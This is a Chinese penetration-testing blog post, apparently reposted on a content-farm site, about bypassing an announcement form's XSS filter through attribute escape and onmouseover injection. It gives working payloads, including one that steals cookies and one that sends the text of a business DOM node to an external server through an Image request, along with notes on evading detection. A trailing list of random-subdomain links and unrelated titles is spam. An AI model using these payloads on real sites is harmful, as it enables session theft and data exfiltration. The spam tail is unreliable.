当前位置: 首页 > wzjs >正文

网站创建想法高水平建设专业网站

网站创建想法,高水平建设专业网站,网站如何关闭,华为弹性云服务器创建wordpress声明 本文章所分享内容仅用于网络安全相关的技术讨论和学习,注意,切勿用于违法途径,所有渗透测试都需要获取授权,违者后果自行承担,与本文章及作者无关,请谨记守法。 0x1. 概述 由于漏洞系统比较敏感&am…

声明

本文章所分享内容仅用于网络安全相关的技术讨论和学习,注意,切勿用于违法途径,所有渗透测试都需要获取授权,违者后果自行承担,与本文章及作者无关,请谨记守法。

0x1. 概述

由于漏洞系统比较敏感,下面涉及域名地址的相关图片我就只能厚码打上,感谢各位看官的支持与理解!!!

0x2. 正文

0x01 漏洞发现:

进入系统后就发现有发布公告的功能点,当然会测试一番,好家伙,被过滤了,在换,再试,然后看js,确实过滤,就不断尝试,burp改包发包验证,常规xss语句看来是弹窗不了;不要问我为什么就觉得这里有问题,问就是凭借直觉和它做了过滤动作,必定有没有过滤到位的,自然也就坚持去搞搞。

然后就看了,发布公告的里面输入框具体过滤什么,分析后就开始绕过之路!!!

从js可以知道存在前端过滤+符号转义+禁用字符检测,同时也分析发现前端过滤机制excludeSpecial()函数被注释无效,containSpecial()仅检测$^<>和script关键词,就是使用绕过特殊字符检测,采用无尖括号事件处理器:onmouseover代替onload。

0x02 验证漏洞:

分析后就如下方式尝试构造如下3个poc进行绕过:

  1. 语法构造优化
    • " x=":强制闭合原始属性
    • 空格分隔:绕过空格过滤检测
    • 省略引号:采用无引号事件调用
  1. 特征规避技术
    • 避免使用黑名单字符:<>$^等
    • 避开关键词:不使用script/js/http等
    • 使用低频事件处理器:onmouseover> onclick

POC

验证阶段

渗透对象

" οnmοuseοver="alert(1)" x="

基础验证弹窗

事件触发机制

" οnmοuseοver="alert(document.cookie)" x="

会话穿透

HttpOnly Cookie保护

" οnmοuseοver="(new Image).src='...'" x="

数据渗出

DOM核心业务节点

" onmouseover="alert(1)" x="1. 关键字符检测仅限 [$^<>],空格/引号/括号均被放行
2. "script"检测可通过事件处理器绕过
3. 未监控Image对象请求外部资源行为  

DOM精准渗透/流量伪装技术:

" onmouseover="alert(document.cookie)" x="    " onmouseover="(new Image).src='https://x.xxx.xx.xx:8000/log?k='+encodeURIComponent(document.querySelector('.th_bg').innerText)
" x=" .th_bg             // 定位企业公告核心DOM节点
.innerText         // 文本提取避开HTML结构干扰
encodeURIComponent // 规避特殊字符警报
(new Image).src=   // 伪装图片请求
'http://'+IP+端口   // 绕过协议关键字检测
/log?k=            // 模拟正常日志请求

漏洞核心突破点

  • 无视containSpecial()函数对$^<>和script的检测
  • 利用前端过滤失效实现HTML属性逃逸
  • 实现从基础弹窗到业务数据窃取的攻击
  • 输入检测盲区 + 渲染层无过滤 = 持久化攻击链

0x3. 总结

根本漏洞链
无效过滤函数 → 事件处理器白名单缺失 → 属性逃逸构造 → DOM数据渗出

完整漏洞链

渗透测试链路

过滤检测 → 属性逃逸 → 事件注入 → 数据提取 → 外传通道//坚持自己选择,不要遇到绕不过的就放弃了,毕竟有很多事情,不起尝试怎么知道自己不行咯!

0x4. 最后忠告

XSS漏洞挖掘的本质是语法与规则的对抗。成功的挖掘必须建立在:

  1. 对过滤机制的逆向解构
  2. 业务场景数据节点的测绘
  3. 渗出通道的隐蔽性保障 保持对空格/引号/括号等基础语法元素的敏感性,往往比追求复杂攻击技术更有成效!

文章转载自:

http://lDVgLW6o.mLpch.cn
http://fEAraki3.mLpch.cn
http://ymFsoLB6.mLpch.cn
http://HfflfI2A.mLpch.cn
http://oGnZsvKT.mLpch.cn
http://LvQtma5p.mLpch.cn
http://MAjBG6AW.mLpch.cn
http://pibFSqyO.mLpch.cn
http://9okHvufP.mLpch.cn
http://MDgc797g.mLpch.cn
http://25cleuY5.mLpch.cn
http://hBbeb1p9.mLpch.cn
http://FAi5BzKb.mLpch.cn
http://8KlO5U5B.mLpch.cn
http://N4SRybor.mLpch.cn
http://0Hbsvudv.mLpch.cn
http://isivQ69h.mLpch.cn
http://JwkrhT5c.mLpch.cn
http://WKRtVi14.mLpch.cn
http://8SZHJ4IP.mLpch.cn
http://GQiTxzBk.mLpch.cn
http://PNTdpp8b.mLpch.cn
http://JuuG97LJ.mLpch.cn
http://9cdfYRvb.mLpch.cn
http://fLdWTA3S.mLpch.cn
http://5NQvopA1.mLpch.cn
http://bZ8IBvZ9.mLpch.cn
http://9vzoflIz.mLpch.cn
http://3pZDg9fK.mLpch.cn
http://UB33llA0.mLpch.cn
http://www.dtcms.com/wzjs/751663.html

相关文章:

  • 网站建设的好处有什么用浙江建设干部学校网站
  • 一般小型教育网站的建设和开发网络服务器配置与管理试题
  • 无锡地区做网站WordPress VIP充值
  • 怎么做微信网站推广网站怎么加内容吗
  • 传奇服务器如何做网站北京网站开发网站建设报价
  • 免费ppt下载网站有哪些flash网站开发工具
  • 搬瓦工如何搭建做网站湖北响应式网页建设企业
  • 精品设计网站苏州市住房和城乡建设局投折网站
  • 有什么网站可以做六级题目嘛河北建设厅官方网站八大员考试
  • 服务器网站部署网站域解析查询
  • 同性男做的视频网站网站建设款如何入账
  • 手机代码网站有哪些问题吗discuz可以做门户网站吗
  • 基于django的电子商务网站设计三好街 网站建设
  • 福安 网站设计公司网站建设价格贵吗
  • 一个网站里面只放一个图片怎么做的室内设计学校哪些比较好
  • 网站建设实训步骤网页制作教程(第三版)
  • 个人网站备案怎么做织梦网站被做跳转
  • 建设一个网站的所有代码如何自己制作网页
  • 百度权重9的网站php视频转码
  • 建立网站编程wordpress 登陆接口
  • wordpress 远程插件安装 ftpseo3分子的立体构型
  • 江苏百城建设有限公司官方网站网站菜单分类怎么做
  • 谷歌网站推广费用wordpress登入插件
  • 需要注册的网站建设python安装教程
  • 济南网站建设 行知科技哪里可以做网站的
  • 焦作建设银行门户网站南昌百度关键词搜索
  • 企业开源网站系统地方门户网站赚钱
  • 网站社区怎么创建网页设计如何居中
  • cpa网站建设教程湖南网站开发公司
  • 电脑建设网站在互联网访问南充做网站公司